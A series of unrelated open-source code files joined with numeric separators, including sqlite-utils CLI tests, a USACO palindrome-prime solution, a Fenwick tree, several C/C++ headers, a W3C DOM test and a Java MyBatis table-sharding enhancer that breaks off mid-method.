assert json.loads(result.output.strip()) == [
{"name": "Bants", "age": None, "nested": None},
{"name": "Dori", "age": 1, "nested": '{"nest": 1}'},
]
@pytest.mark.parametrize("use_stdin", (True, False))
def test_memory_json_nl(tmpdir, use_stdin):
data = '{"name": "Bants"}\n\n{"name": "Dori"}'
if use_stdin:
input = data
path = "stdin:nl"
sql_from = "stdin"
else:
input = None
path = str(tmpdir / "chickens.json")
open(path, "w").write(data)
path = path + ":nl"
sql_from = "chickens"
result = CliRunner().invoke(
cli.cli,
["memory", path, "select * from {}".format(sql_from)],
input=input,
)
assert result.exit_code == 0, result.output
assert json.loads(result.output.strip()) == [
{"name": "Bants"},
{"name": "Dori"},
]
@pytest.mark.parametrize("use_stdin", (True, False))
def test_memory_csv_encoding(tmpdir, use_stdin):
latin1_csv = (
b"date,name,latitude,longitude\n" b"2020-03-04,S\xe3o Paulo,-23.561,-46.645\n"
)
input = None
if use_stdin:
input = latin1_csv
csv_path = "-"
sql_from = "stdin"
else:
csv_path = str(tmpdir / "test.csv")
with open(csv_path, "wb") as fp:
fp.write(latin1_csv)
sql_from = "test"
# Without --encoding should error:
assert (
CliRunner()
.invoke(
cli.cli,
["memory", csv_path, "select * from {}".format(sql_from), "--nl"],
input=input,
)
.exit_code
== 1
)
# With --encoding should work:
result = CliRunner().invoke(
cli.cli,
["memory", "-", "select * from stdin", "--encoding", "latin-1", "--nl"],
input=latin1_csv,
)
assert result.exit_code == 0, result.output
assert json.loads(result.output.strip()) == {
"date": "2020-03-04",
"name": "São Paulo",
"latitude": -23.561,
"longitude": -46.645,
}
@pytest.mark.parametrize("extra_args", ([], ["select 1"]))
def test_memory_dump(extra_args):
result = CliRunner().invoke(
cli.cli,
["memory", "-"] + extra_args + ["--dump"],
input="id,name\n1,Cleo\n2,Bants",
)
assert result.exit_code == 0
assert result.output.strip() == (
"BEGIN TRANSACTION;\n"
'CREATE TABLE "stdin" (\n'
" [id] INTEGER,\n"
" [name] TEXT\n"
");\n"
"INSERT INTO \"stdin\" VALUES(1,'Cleo');\n"
"INSERT INTO \"stdin\" VALUES(2,'Bants');\n"
"CREATE VIEW t1 AS select * from [stdin];\n"
"CREATE VIEW t AS select * from [stdin];\n"
"COMMIT;"
)
@pytest.mark.parametrize("extra_args", ([], ["select 1"]))
def test_memory_schema(extra_args):
result = CliRunner().invoke(
cli.cli,
["memory", "-"] + extra_args + ["--schema"],
input="id,name\n1,Cleo\n2,Bants",
)
assert result.exit_code == 0
assert result.output.strip() == (
'CREATE TABLE "stdin" (\n'
" [id] INTEGER,\n"
" [name] TEXT\n"
");\n"
"CREATE VIEW t1 AS select * from [stdin];\n"
"CREATE VIEW t AS select * from [stdin];"
)
@pytest.mark.parametrize("extra_args", ([], ["select 1"]))
def test_memory_save(tmpdir, extra_args):
save_to = str(tmpdir / "save.db")
result = CliRunner().invoke(
cli.cli,
["memory", "-"] + extra_args + ["--save", save_to],
input="id,name\n1,Cleo\n2,Bants",
)
assert result.exit_code == 0
db = Database(save_to)
assert list(db["stdin"].rows) == [
{"id": 1, "name": "Cleo"},
{"id": 2, "name": "Bants"},
]
@pytest.mark.parametrize("option", ("-n", "--no-detect-types"))
def test_memory_no_detect_types(option):
result = CliRunner().invoke(
cli.cli,
["memory", "-", "select * from stdin"] + [option],
input="id,name,weight\n1,Cleo,45.5\n2,Bants,3.5",
)
assert result.exit_code == 0, result.output
assert json.loads(result.output.strip()) == [
{"id": "1", "name": "Cleo", "weight": "45.5"},
{"id": "2", "name": "Bants", "weight": "3.5"},
]
def test_memory_analyze():
result = CliRunner().invoke(
cli.cli,
["memory", "-", "--analyze"],
input="id,name\n1,Cleo\n2,Bants",
)
assert result.exit_code == 0
assert result.output == (
"stdin.id: (1/2)\n\n"
" Total rows: 2\n"
" Null rows: 0\n"
" Blank rows: 0\n\n"
" Distinct values: 2\n\n"
"stdin.name: (2/2)\n\n"
" Total rows: 2\n"
" Null rows: 0\n"
" Blank rows: 0\n\n"
" Distinct values: 2\n\n"
)
def test_memory_two_files_with_same_stem(tmpdir):
(tmpdir / "one").mkdir()
(tmpdir / "two").mkdir()
one = tmpdir / "one" / "data.csv"
two = tmpdir / "two" / "data.csv"
one.write_text("id,name\n1,Cleo\n2,Bants", encoding="utf-8")
two.write_text("id,name\n3,Blue\n4,Lila", encoding="utf-8")
result = CliRunner().invoke(cli.cli, ["memory", str(one), str(two), "", "--schema"])
assert result.exit_code == 0
assert result.output == (
'CREATE TABLE "data" (\n'
" [id] INTEGER,\n"
" [name] TEXT\n"
");\n"
"CREATE VIEW t1 AS select * from [data];\n"
"CREATE VIEW t AS select * from [data];\n"
'CREATE TABLE "data_2" (\n'
" [id] INTEGER,\n"
" [name] TEXT\n"
");\n"
"CREATE VIEW t2 AS select * from [data_2];\n"
)
| 3,947 |
335 | {
"word": "Scrimmage",
"definitions": [
"A confused struggle or fight.",
"A sequence of play beginning with the placing of the ball on the ground with its longest axis at right angles to the goal line.",
"A session in which teams practise by playing a simulated game."
],
"parts-of-speech": "Noun"
} | 115 |
1,760 | <filename>Contests/USACO Training/Ch 1/1.5 pprime.cpp
/*
ID: bqi3431
PROG: pprime
LANG: C++11
*/
#include <iostream>
#include <fstream>
#include <vector>
#include <ext/pb_ds/assoc_container.hpp>
#include <ext/pb_ds/tree_policy.hpp>
using namespace std;
using namespace __gnu_pbds;
typedef long long ll;
typedef vector<int> vi;
typedef pair<int, int> pi;
typedef tree<int,null_type,less<int>,rb_tree_tag,tree_order_statistics_node_update> ordered_set;
#define FOR(i, a, b) for (int i=a; i<b; i++)
#define F0R(i, a) for (int i=0; i<a; i++)
#define FORd(i,a,b) for (int i = (b)-1; i >= a; i--)
#define F0Rd(i,a) for (int i = (a)-1; i >= 0; i--)
#define mp make_pair
#define pb push_back
#define f first
#define s second
#define lb lower_bound
#define ub upper_bound
const int MOD = 1000000007;
double PI = 4*atan(1);
vi ans,primes;
void genprimes() {
FOR(i,2,10001) {
bool f = 1;
for (int j: primes) {
if (i%j == 0) {
f = 0;
break;
}
if (j*j>i) break;
}
if (f) primes.pb(i);
}
}
int isprime(int k) {
for (int i: primes) {
if (k % i == 0 && k != i) return 0;
if (i*i>k) return 1;
}
return 1;
}
int rev(int k) {
string z = to_string(k);
reverse(z.begin(),z.end());
return stoi(z);
}
int main() {
//ifstream cin ("pprime.in");
//ofstream cout ("pprime.out");
genprimes();
int a,b; cin >> a >> b;
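	//Build palindromes by digit count i: even i mirrors a half j (t = j*10^(i/2) + rev(j)); odd i also inserts a middle digit z.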
FOR(i,1,9) {
if (i % 2 == 0) {
FOR(j,pow(10,i/2-1),pow(10,i/2)) {
int t = pow(10,i/2)*j+rev(j);
if (isprime(t) && t >= a && t <= b)
cout << t << "\n";
}
} else {
FOR(j,pow(10,i/2-1),pow(10,i/2)) F0R(z,10) {
int t = pow(10,i/2+1)*j+pow(10,i/2)*z+rev(j);
if (isprime(t) && t >= a && t <= b)
cout << t << "\n";
}
}
}
}
| 875 |
2,151 | <reponame>zipated/src
// Copyright 2016 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef ASH_WM_DRAG_WINDOW_RESIZER_MASH_H_
#define ASH_WM_DRAG_WINDOW_RESIZER_MASH_H_
#include <memory>
#include "ash/wm/window_resizer.h"
#include "base/macros.h"
namespace ash {
// DragWindowResizer is a decorator of WindowResizer and adds the ability to
// drag windows across displays.
class DragWindowResizerMash : public WindowResizer {
public:
DragWindowResizerMash(std::unique_ptr<WindowResizer> next_window_resizer,
wm::WindowState* window_state);
~DragWindowResizerMash() override;
// WindowResizer:
void Drag(const gfx::Point& location, int event_flags) override;
void CompleteDrag() override;
void RevertDrag() override;
private:
std::unique_ptr<WindowResizer> next_window_resizer_;
DISALLOW_COPY_AND_ASSIGN(DragWindowResizerMash);
};
} // namespace ash
#endif // ASH_WM_DRAG_WINDOW_RESIZER_MASH_H_
| 380 |
634 | <reponame>vzsky/Algorithms
/*
Petar 'PetarV' Velickovic
Data Structure: Binary Indexed Tree
*/
#include <stdio.h>
#include <math.h>
#include <string.h>
#include <iostream>
#include <vector>
#include <list>
#include <string>
#include <algorithm>
#include <queue>
#include <stack>
#include <set>
#include <map>
#include <complex>
#define MAX_N 1000001
using namespace std;
typedef long long lld;
int n;
int bit[MAX_N];
//Structure for efficiently maintaining cumulative (prefix) sums
//Complexity: O(log N) per operation; x & -x isolates the lowest set bit
inline void update(int x, int val)
{
while (x <= n)
{
bit[x] += val;
x += (x & -x);
}
}
inline int read(int x)
{
int ret = 0;
while (x > 0)
{
ret += bit[x];
x -= (x & -x);
}
return ret;
}
int main()
{
n = 10;
update(1, 1);
update(3, 1);
update(5, 5);
update(2, -2);
update(5, -1);
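	// expected output: 4 (prefix sum over indices 1..6: +1 - 2 + 1 + 5 - 1)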
printf("%d\n",read(6));
return 0;
}
| 438 |
478 | <gh_stars>100-1000
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License.
#pragma once
namespace AdaptiveCards::Rendering::Uwp::MediaHelpers
{
winrt::Image GetMediaPosterAsImage(winrt::AdaptiveRenderContext const& renderContext,
winrt::AdaptiveRenderArgs const& renderArgs,
winrt::AdaptiveMedia const& adaptiveMedia);
winrt::UIElement CreatePosterContainerWithPlayButton(winrt::Image const& posterImage,
winrt::AdaptiveRenderContext const& renderContext,
winrt::AdaptiveRenderArgs const& renderArgs);
std::tuple<winrt::Uri, winrt::hstring> GetMediaSource(winrt::AdaptiveHostConfig const& hostConfig,
winrt::AdaptiveMedia const& adaptiveMedia);
void HandleMediaClick(winrt::AdaptiveRenderContext const& renderContext,
winrt::AdaptiveMedia const& adaptiveMedia,
winrt::MediaElement const& mediaElement,
winrt::UIElement const& posterContainer,
winrt::Uri const& mediaSourceUrl,
winrt::hstring const& mimeType,
winrt::AdaptiveMediaEventInvoker const& mediaInvoker);
}
| 742 |
2,151 |
/*
This Java source file was generated by test-to-java.xsl
and is a derived work from the source document.
The source document contained the following notice:
Copyright (c) 2001-2004 World Wide Web Consortium,
(Massachusetts Institute of Technology, Institut National de
Recherche en Informatique et en Automatique, Keio University). All
Rights Reserved. This program is distributed under the W3C's Software
Intellectual Property License. This program is distributed in the
hope that it will be useful, but WITHOUT ANY WARRANTY; without even
the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
PURPOSE.
See W3C License http://www.w3.org/Consortium/Legal/ for more details.
*/
package org.w3c.domts.level1.core;
import org.w3c.dom.*;
import org.w3c.domts.DOMTestCase;
import org.w3c.domts.DOMTestDocumentBuilderFactory;
/**
* The "createEntityReference(name)" method creates an
* EntityReference node. In addition, if the referenced entity
* is known, the child list of the "EntityReference" node
* is the same as the corresponding "Entity" node.
*
* Retrieve the entire DOM document and invoke its
* "createEntityReference(name)" method. It should create
* a new EntityReference node for the Entity with the
* given name. The referenced entity is known, therefore the child
* list of the "EntityReference" node is the same as the corresponding
* "Entity" node.
* @author NIST
* @author <NAME>
* @see <a href="http://www.w3.org/TR/1998/REC-DOM-Level-1-19981001/level-one-core#ID-392B75AE">http://www.w3.org/TR/1998/REC-DOM-Level-1-19981001/level-one-core#ID-392B75AE</a>
*/
public final class documentcreateentityreferenceknown extends DOMTestCase {
/**
* Constructor.
* @param factory document factory, may not be null
* @throws org.w3c.domts.DOMTestIncompatibleException Thrown if test is not compatible with parser configuration
*/
public documentcreateentityreferenceknown(final DOMTestDocumentBuilderFactory factory) throws org.w3c.domts.DOMTestIncompatibleException {
super(factory);
//
// check if loaded documents are supported for content type
//
String contentType = getContentType();
preload(contentType, "staff", true);
}
/**
* Runs the test case.
* @throws Throwable Any uncaught exception causes test to fail
*/
public void runTest() throws Throwable {
Document doc;
EntityReference newEntRefNode;
NodeList newEntRefList;
Node child;
String name;
String value;
doc = (Document) load("staff", true);
newEntRefNode = doc.createEntityReference("ent3");
assertNotNull("createdEntRefNotNull", newEntRefNode);
newEntRefList = newEntRefNode.getChildNodes();
assertSize("size", 1, newEntRefList);
child = newEntRefNode.getFirstChild();
name = child.getNodeName();
assertEquals("name", "#text", name);
value = child.getNodeValue();
assertEquals("value", "Texas", value);
}
/**
* Gets URI that identifies the test.
* @return uri identifier of test
*/
public String getTargetURI() {
return "http://www.w3.org/2001/DOM-Test-Suite/level1/core/documentcreateentityreferenceknown";
}
/**
* Runs this test from the command line.
* @param args command line arguments
*/
public static void main(final String[] args) {
DOMTestCase.doMain(documentcreateentityreferenceknown.class, args);
}
}
| 1,156 |
312 | <filename>mpp/common/h265e_syntax_new.h
/*
* Copyright 2015 Rockchip Electronics Co. LTD
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#ifndef __H265E_SYNTAX_NEW_H__
#define __H265E_SYNTAX_NEW_H__
#include "mpp_rc.h"
#include "h265_syntax.h"
#include "rc.h"
typedef struct H265PicEntry_t {
RK_U8 slot_idx;
} H265ePicEntry;
typedef struct H265ePicParams_t {
RK_U16 pic_width;
RK_U16 pic_height;
RK_U16 hor_stride;
RK_U16 ver_stride;
RK_U16 pic_ofsty;
RK_U16 pic_oftx;
RK_U32 mpp_format;
union {
struct {
RK_U16 chroma_format_idc : 2;
RK_U16 separate_colour_plane_flag : 1;
RK_U16 bit_depth_luma_minus8 : 3;
RK_U16 bit_depth_chroma_minus8 : 3;
RK_U16 log2_max_pic_order_cnt_lsb_minus4 : 4;
RK_U16 NoPicReorderingFlag : 1;
RK_U16 NoBiPredFlag : 1;
RK_U16 ReservedBits1 : 1;
};
RK_U16 wFormatAndSequenceInfoFlags;
};
RK_U8 sps_max_dec_pic_buffering_minus1;
RK_U8 log2_min_luma_coding_block_size_minus3;
RK_U8 log2_diff_max_min_luma_coding_block_size;
RK_U8 log2_min_transform_block_size_minus2;
RK_U8 log2_diff_max_min_transform_block_size;
RK_U8 max_transform_hierarchy_depth_inter;
RK_U8 max_transform_hierarchy_depth_intra;
RK_U8 num_short_term_ref_pic_sets;
RK_U8 num_long_term_ref_pics_sps;
RK_U8 num_ref_idx_l0_default_active_minus1;
RK_U8 num_ref_idx_l1_default_active_minus1;
RK_S8 init_qp_minus26;
RK_U16 ReservedBits2;
union {
struct {
RK_U32 scaling_list_enabled_flag : 1;
RK_U32 amp_enabled_flag : 1;
RK_U32 sample_adaptive_offset_enabled_flag : 1;
RK_U32 pcm_enabled_flag : 1;
RK_U32 pcm_sample_bit_depth_luma_minus1 : 4;
RK_U32 pcm_sample_bit_depth_chroma_minus1 : 4;
RK_U32 log2_min_pcm_luma_coding_block_size_minus3 : 2;
RK_U32 log2_diff_max_min_pcm_luma_coding_block_size : 2;
RK_U32 pcm_loop_filter_disabled_flag : 1;
RK_U32 long_term_ref_pics_present_flag : 1;
RK_U32 sps_temporal_mvp_enabled_flag : 1;
RK_U32 strong_intra_smoothing_enabled_flag : 1;
RK_U32 dependent_slice_segments_enabled_flag : 1;
RK_U32 output_flag_present_flag : 1;
RK_U32 num_extra_slice_header_bits : 3;
RK_U32 sign_data_hiding_enabled_flag : 1;
RK_U32 cabac_init_present_flag : 1;
RK_U32 ReservedBits3 : 5;
};
RK_U32 CodingParamToolFlags;
};
union {
struct {
RK_U32 constrained_intra_pred_flag : 1;
RK_U32 transform_skip_enabled_flag : 1;
RK_U32 cu_qp_delta_enabled_flag : 1;
RK_U32 pps_slice_chroma_qp_offsets_present_flag : 1;
RK_U32 weighted_pred_flag : 1;
RK_U32 weighted_bipred_flag : 1;
RK_U32 transquant_bypass_enabled_flag : 1;
RK_U32 tiles_enabled_flag : 1;
RK_U32 entropy_coding_sync_enabled_flag : 1;
RK_U32 uniform_spacing_flag : 1;
RK_U32 loop_filter_across_tiles_enabled_flag : 1;
RK_U32 pps_loop_filter_across_slices_enabled_flag : 1;
RK_U32 deblocking_filter_override_enabled_flag : 1;
RK_U32 pps_deblocking_filter_disabled_flag : 1;
RK_U32 lists_modification_present_flag : 1;
RK_U32 slice_segment_header_extension_present_flag : 1;
RK_U32 ReservedBits4 : 16;
};
RK_U32 CodingSettingPicturePropertyFlags;
};
RK_S8 pps_cb_qp_offset;
RK_S8 pps_cr_qp_offset;
RK_U8 num_tile_columns_minus1;
RK_U8 num_tile_rows_minus1;
RK_S32 column_width_minus1[19];
RK_S32 row_height_minus1[21];
RK_U8 diff_cu_qp_delta_depth;
RK_S8 pps_beta_offset_div2;
RK_S8 pps_tc_offset_div2;
RK_U8 log2_parallel_merge_level_minus2;
RK_U32 vps_id;
RK_U32 pps_id;
RK_U32 sps_id;
RK_U8 scaling_list_data_present_flag;
} H265ePicParams;
typedef struct H265eSlicParams_t {
union {
struct {
RK_U32 sli_splt : 1;
RK_U32 sli_splt_mode : 1;
RK_U32 sli_splt_cpst : 1;
RK_U32 sli_flsh : 1;
RK_U32 cbc_init_flg : 1;
RK_U32 mvd_l1_zero_flg : 1;
RK_U32 merge_up_flag : 1;
RK_U32 merge_left_flag : 1;
RK_U32 ref_pic_lst_mdf_l0 : 1;
RK_U32 num_refidx_act_ovrd : 1;
RK_U32 sli_sao_chrm_flg : 1;
RK_U32 sli_sao_luma_flg : 1;
RK_U32 sli_tmprl_mvp_en : 1;
RK_U32 pic_out_flg : 1;
RK_U32 dpdnt_sli_seg_flg : 1;
RK_U32 no_out_pri_pic : 1;
RK_U32 sli_lp_fltr_acrs_sli : 1;
RK_U32 sli_dblk_fltr_dis : 1;
RK_U32 dblk_fltr_ovrd_flg : 1;
RK_U32 col_ref_idx : 1;
RK_U32 col_frm_l0_flg : 1;
RK_U32 st_ref_pic_flg : 1;
RK_U32 num_pos_pic : 1;
RK_U32 dlt_poc_msb_prsnt0 : 1;
RK_U32 dlt_poc_msb_prsnt1 : 1;
RK_U32 dlt_poc_msb_prsnt2 : 1;
RK_U32 used_by_lt_flg0 : 1;
RK_U32 used_by_lt_flg1 : 1;
RK_U32 used_by_lt_flg2 : 1;
RK_U32 ReservedBits : 3;
};
RK_U32 CodingSliceFlags;
};
H265ePicEntry recon_pic;
H265ePicEntry ref_pic;
RK_S8 sli_tc_ofst_div2;
RK_S8 sli_beta_ofst_div2;
RK_S8 sli_cb_qp_ofst;
RK_U8 sli_qp;
RK_U8 max_mrg_cnd;
RK_U8 lst_entry_l0;
RK_U8 num_refidx_l1_act;
RK_U8 num_refidx_l0_act;
RK_U8 slice_type;
RK_U8 slice_rsrv_flg;
RK_U8 sli_pps_id;
RK_U8 lt_idx_sps;
RK_U8 num_lt_pic;
RK_U8 st_ref_pic_idx;
RK_U8 num_lt_sps;
RK_U8 used_by_s0_flg;
RK_U8 num_neg_pic;
RK_U16 sli_poc_lsb;
RK_U16 sli_hdr_ext_len;
RK_U16 poc_lsb_lt0;
RK_U16 sli_max_num_m1;
RK_U16 sli_splt_cnum_m1;
RK_U16 dlt_poc_msb_cycl0;
RK_U16 dlt_poc_s0_m10;
RK_U16 dlt_poc_s0_m11;
RK_U16 dlt_poc_s0_m12;
RK_U16 dlt_poc_s0_m13;
RK_U16 poc_lsb_lt1;
RK_U16 poc_lsb_lt2;
RK_U16 dlt_poc_msb_cycl1;
RK_U16 dlt_poc_msb_cycl2;
RK_U32 sli_splt_byte;
RK_U32 tot_poc_num;
RK_U32 non_reference_flag;
} H265eSlicParams;
/*
* Split reference frame configure to two parts
* The first part is slice depended info like poc / frame_num, and frame
* type and flags.
* The other part is gop structure depended info like gop index, ref_status
* and ref_frm_index. This part is inited from dpb gop hierarchy info.
*/
typedef struct UserDatas_t {
void *plt_data;
} UserDatas;
typedef struct H265eSyntax_new_t {
RK_S32 idr_request;
H265ePicParams pp;
H265eSlicParams sp;
} H265eSyntax_new;
#ifdef __cplusplus
extern "C" {
#endif
RK_S32 h265e_syntax_fill(void *ctx);
#ifdef __cplusplus
}
#endif
#endif
| 5,155 |
679 | <filename>main/desktop/source/deployment/gui/dp_gui.h<gh_stars>100-1000
/**************************************************************
*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*
*************************************************************/
#if ! defined INCLUDED_DP_GUI_H
#define INCLUDED_DP_GUI_H
#include "dp_gui_updatedata.hxx"
#include "dp_misc.h"
#include "dp_gui.hrc"
#include "rtl/ref.hxx"
#include "rtl/instance.hxx"
#include "osl/thread.hxx"
#include "cppuhelper/implbase2.hxx"
#include "vcl/svapp.hxx"
#include "vcl/dialog.hxx"
#include "vcl/button.hxx"
#include "vcl/fixed.hxx"
#include "salhelper/simplereferenceobject.hxx"
#include "svtools/svtabbx.hxx"
#include "svtools/headbar.hxx"
#include "com/sun/star/ucb/XContentEventListener.hpp"
#include "osl/mutex.hxx"
#include <list>
#include <memory>
#include <queue>
namespace com { namespace sun { namespace star {
namespace container {
class XNameAccess;
}
namespace frame {
class XDesktop;
}
namespace awt {
class XWindow;
}
namespace uno {
class XComponentContext;
}
namespace deployment {
class XPackageManagerFactory;
}
} } }
namespace svt {
class FixedHyperlink;
}
namespace dp_gui {
enum PackageState { REGISTERED, NOT_REGISTERED, AMBIGUOUS, NOT_AVAILABLE };
//==============================================================================
class SelectedPackage: public salhelper::SimpleReferenceObject {
public:
SelectedPackage() {}
SelectedPackage( const ::com::sun::star::uno::Reference< ::com::sun::star::deployment::XPackage> &xPackage)
: m_xPackage( xPackage )
{}
virtual ~SelectedPackage();
::com::sun::star::uno::Reference< ::com::sun::star::deployment::XPackage> getPackage() const { return m_xPackage; }
private:
SelectedPackage(SelectedPackage &); // not defined
void operator =(SelectedPackage &); // not defined
::com::sun::star::uno::Reference< ::com::sun::star::deployment::XPackage> m_xPackage;
};
} // namespace dp_gui
#endif
| 918 |
2,151 | // Copyright (c) 2012 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef NET_THIRD_PARTY_SPDY_CORE_SPDY_TEST_UTILS_H_
#define NET_THIRD_PARTY_SPDY_CORE_SPDY_TEST_UTILS_H_
#include <stddef.h>
#include <stdint.h>
#include <map>
#include <memory>
#include "net/spdy/server_push_delegate.h"
#include "net/test/gtest_util.h"
#include "net/third_party/spdy/core/spdy_bug_tracker.h"
#include "net/third_party/spdy/core/spdy_header_block.h"
#include "net/third_party/spdy/core/spdy_headers_handler_interface.h"
#include "net/third_party/spdy/core/spdy_protocol.h"
#include "net/third_party/spdy/platform/api/spdy_string.h"
#include "net/third_party/spdy/platform/api/spdy_string_piece.h"
#define EXPECT_SPDY_BUG EXPECT_DFATAL
namespace spdy {
inline bool operator==(SpdyStringPiece x,
const SpdyHeaderBlock::ValueProxy& y) {
return x == y.as_string();
}
namespace test {
SpdyString HexDumpWithMarks(const unsigned char* data,
int length,
const bool* marks,
int mark_length);
void CompareCharArraysWithHexError(const SpdyString& description,
const unsigned char* actual,
const int actual_len,
const unsigned char* expected,
const int expected_len);
void SetFrameFlags(SpdySerializedFrame* frame, uint8_t flags);
void SetFrameLength(SpdySerializedFrame* frame, size_t length);
// A test implementation of SpdyHeadersHandlerInterface that correctly
// reconstructs multiple header values for the same name.
class TestHeadersHandler : public SpdyHeadersHandlerInterface {
public:
TestHeadersHandler() {}
void OnHeaderBlockStart() override;
void OnHeader(SpdyStringPiece name, SpdyStringPiece value) override;
void OnHeaderBlockEnd(size_t header_bytes_parsed,
size_t compressed_header_bytes_parsed) override;
const SpdyHeaderBlock& decoded_block() const { return block_; }
size_t header_bytes_parsed() const { return header_bytes_parsed_; }
size_t compressed_header_bytes_parsed() const {
return compressed_header_bytes_parsed_;
}
private:
SpdyHeaderBlock block_;
size_t header_bytes_parsed_ = 0;
size_t compressed_header_bytes_parsed_ = 0;
DISALLOW_COPY_AND_ASSIGN(TestHeadersHandler);
};
} // namespace test
} // namespace spdy
#endif // NET_THIRD_PARTY_SPDY_CORE_SPDY_TEST_UTILS_H_
| 1,094 |
770 | package com.mogujie.trade.tsharding.route.orm;
import com.mogujie.trade.tsharding.client.ShardingCaculator;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtMethod;
import javassist.bytecode.ClassFile;
import javassist.bytecode.ConstPool;
import org.apache.ibatis.mapping.MappedStatement;
import org.apache.ibatis.mapping.ResultMap;
import org.apache.ibatis.mapping.SqlSource;
import org.apache.ibatis.reflection.MetaObject;
import org.apache.ibatis.reflection.factory.DefaultObjectFactory;
import org.apache.ibatis.reflection.factory.ObjectFactory;
import org.apache.ibatis.reflection.wrapper.DefaultObjectWrapperFactory;
import org.apache.ibatis.reflection.wrapper.ObjectWrapperFactory;
import org.apache.ibatis.session.Configuration;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
/**
 * Generic Mapper enhancement base class; subclass it when extending Mapper SQL.
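 * Example: a subclass supplies a method returning a SqlSource; setSqlSource then registers
 * 512 sharded MappedStatement variants of it (one per table-shard suffix).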
*
* @author qigong on 5/1/15
*/
public abstract class MapperEnhancer {
private static ClassPool pool = ClassPool.getDefault();
private Map<String, Method> methodMap = new HashMap<String, Method>();
private Class<?> mapperClass;
public MapperEnhancer(Class<?> mapperClass) {
this.mapperClass = mapperClass;
}
/**
     * Marker method used by the code enhancement.
*
* @param record
*/
public String enhancedShardingSQL(Object record) {
return "enhancedShardingSQL";
}
public MapperEnhancer() {
super();
}
/**
     * Enhances the mapper: generates new mapper interfaces and eagerly loads them into the classloader.
*
* @param mapperClassName
*/
public static void enhanceMapperClass(String mapperClassName) throws Exception {
Class originClass = Class.forName(mapperClassName);
Method[] originMethods = originClass.getDeclaredMethods();
CtClass cc = pool.get(mapperClassName);
for (CtMethod ctMethod : cc.getDeclaredMethods()) {
CtClass enhanceClass = pool.makeInterface(mapperClassName + "Sharding" + ctMethod.getName());
for (long i = 0L; i < 512; i++) {
CtMethod newMethod = new CtMethod(ctMethod.getReturnType(), ctMethod.getName() + ShardingCaculator.getNumberWithZeroSuffix(i), ctMethod.getParameterTypes(), enhanceClass);
Method method = getOriginMethod(newMethod, originMethods);
if(method.getParameterAnnotations()[0].length > 0) {
ClassFile ccFile = enhanceClass.getClassFile();
ConstPool constPool = ccFile.getConstPool();
                    //copy the parameter annotations so mybatis can still bind the generated mapper methods dynamically
newMethod.getMethodInfo().addAttribute(MapperAnnotationEnhancer.duplicateParameterAnnotationsAttribute(constPool, method));
}
enhanceClass.addMethod(newMethod);
}
Class<?> loadThisClass = enhanceClass.toClass();
            //since 2015-09-22 the generated classes are no longer written to local disk
// enhanceClass.writeFile(".");
}
}
private static Method getOriginMethod(CtMethod ctMethod, Method[] originMethods) {
for (Method method : originMethods) {
int len = ctMethod.getName().length();
if (ctMethod.getName().substring(0, len-4).equals(method.getName())) {
return method;
}
}
throw new RuntimeException("enhanceMapperClass find method error!");
}
/**
     * Registers a mapped method.
*
* @param methodName
* @param method
*/
public void addMethodMap(String methodName, Method method) {
methodMap.put(methodName, method);
}
private static final ObjectFactory DEFAULT_OBJECT_FACTORY = new DefaultObjectFactory();
private static final ObjectWrapperFactory DEFAULT_OBJECT_WRAPPER_FACTORY = new DefaultObjectWrapperFactory();
/**
     * Wraps the object for reflection, adding support for older versions of Mybatis.
*
     * @param object the object to reflect
* @return
*/
public static MetaObject forObject(Object object) {
return MetaObject.forObject(object, DEFAULT_OBJECT_FACTORY, DEFAULT_OBJECT_WRAPPER_FACTORY);
}
/**
     * Whether the given generic method is supported.
*
* @param msId
* @return
*/
public boolean supportMethod(String msId) {
Class<?> mapperClass = getMapperClass(msId);
if (this.mapperClass.isAssignableFrom(mapperClass)) {
String methodName = getMethodName(msId);
return methodMap.get(methodName) != null;
}
return false;
}
/**
     * Resets the SqlSource.
*
* @param ms
* @param sqlSource
*/
protected void setSqlSource(MappedStatement ms, SqlSource sqlSource) {
MetaObject msObject = forObject(ms);
msObject.setValue("sqlSource", sqlSource);
}
/**
     * Resets the SqlSource.
*
* @param ms
* @throws java.lang.reflect.InvocationTargetException
* @throws IllegalAccessException
*/
public void setSqlSource(MappedStatement ms, Configuration configuration) throws Exception {
Method method = methodMap.get(getMethodName(ms));
try {
if (method.getReturnType() == Void.TYPE) {
method.invoke(this, ms);
} else if (SqlSource.class.isAssignableFrom(method.getReturnType())) {
                //code enhancement: expand into 512 sharded methods
for (long i = 0; i < 512; i++) {
                    //the new sharding-aware sql
SqlSource sqlSource = (SqlSource) method.invoke(this, ms, configuration, i);
String newMsId = ms.getId() + ShardingCaculator.getNumberWithZeroSuffix(i);
newMsId = newMsId.replace("Mapper.", "MapperSharding" + getMethodName(ms) + ".");
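                    //e.g. "com.foo.OrderMapper.select" -> "com.foo.OrderMapperShardingselect.select0007"
                    //(assuming getNumberWithZeroSuffix renders shard 7 as "0007")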
                    //register it in the MappedStatement store
MappedStatement newMs = copyFromMappedStatement(ms, sqlSource, newMsId);
configuration.addMappedStatement(newMs);
setSqlSource(newMs, sqlSource);
}
} else {
throw new RuntimeException("自定义Mapper方法返回类型错误,可选的返回类型为void和SqlNode!");
}
} catch (IllegalAccessException e) {
throw new RuntimeException(e);
} catch (InvocationTargetException e) {
